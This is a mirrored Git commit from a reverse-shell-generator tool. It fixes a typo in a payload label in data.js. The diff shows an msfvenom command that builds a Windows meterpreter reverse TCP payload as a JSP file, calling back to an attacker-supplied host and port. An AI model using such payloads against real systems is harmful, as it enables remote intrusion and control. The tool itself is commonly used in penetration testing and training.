mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 10:56:10 +00:00
Update data.js
Fixed Typo
This commit is contained in:
parent
a9caa0ff2f
commit
1814b90403
@ -405,7 +405,7 @@ const msfvenomCommands = withCommandType(
|
||||
"meta": ["msfvenom", "windows", "stageless", "reverse"]
|
||||
},
|
||||
{
|
||||
"name": "Windows Staged JSP TCP",
|
||||
"name": "Windows Staged JSP Reverse TCP",
|
||||
"command": "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f jsp -o ./rev.jsp",
|
||||
"meta": ["msfvenom", "windows", "staged", "reverse"]
|
||||
},
|
||||
|
Loading…
Reference in New Issue
Block a user